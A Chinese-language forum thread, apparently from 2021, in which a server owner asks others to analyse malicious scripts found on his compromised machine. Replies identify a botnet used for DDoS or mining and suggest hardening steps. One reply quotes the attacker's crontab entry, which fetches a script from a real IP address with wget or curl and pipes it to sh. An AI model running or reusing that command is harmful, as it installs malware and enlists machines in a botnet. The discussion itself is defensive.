这是一个创建于 1608 天前的主题,其中的信息可能已经有所发展或是发生改变。
http://185.150.117.29/x/b
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
帮忙分析下这些脚本是干什么的?目前看显卡并没有运行,而是定时占用大量带宽。
 | 1 virusdefender 2021-07-06 13:06:26 +08:00 这种一般都是挖矿 |
 | 2 rwecho OP 15 * * * * wget http://185.150.117.29/x/b -O- | sh || curl http://185.150.117.29/x/b | sh 它在电脑里面创建了一个用户名为:ps 然后里面有一个 crontab 命令 |
 | 3 longbow0 2021-07-06 13:21:13 +08:00 主要是从 185.150.117.29 下载适配了不同硬件版本的木马 bot.* 其中,bot.x86 介绍在 https://s.tencent.com/research/report/1101.html |
 | 4 CaffreySun 2021-07-06 13:39:05 +08:00 这个脚步比较简单,就是“感染”你的服务器,并且创建定时任务重复“感染”。 至于他“感染”你的服务做什么,得看他执行的那些“bot”开头的程序了,找大佬反编译分析一下。 或许用来挖坑。 或许用来执行网络攻击。 |
 | 5 wat4me 2021-07-06 16:11:09 +08:00 |
 | 6 Aresrun 2021-07-06 16:27:19 +08:00 我之前也被入侵了。服务器上没啥东西,就重装了系统 |
 | 7 lopetver 2021-07-06 16:34:37 +08:00 |
 | 8 missz 2021-07-06 17:10:59 +08:00 把服务器做为肉鸡,用来 ddos,所以会时不时带宽拉满 |
 | 9 no1xsyzy 2021-07-06 19:00:09 +08:00 命令行 HTTP 客户端竟然是 wget 和 curl 而没有 lynx 我记得哪个 Unix 环境是默认只有 lynx 的来着? |
 | 10 hlobo 2021-07-06 19:05:57 +08:00 via iPhone 攻击它下载脚本的服务器 |
 | 11 changchong 2021-07-06 22:42:41 +08:00 修改端口怎么样 |
 | 12 yogogo 2021-07-07 08:09:40 +08:00 前几天我一台也是给挂挖矿的,后来就关端口,开 selinux,就好了 |
| 13 rwecho OP 已经把下载的脚本清空了,目前没看到有异常情况,之前 root 密码太弱了 |
 | 15 guanyin8cnq12 2021-07-07 13:57:51 +08:00 一个字,格 |
Select Language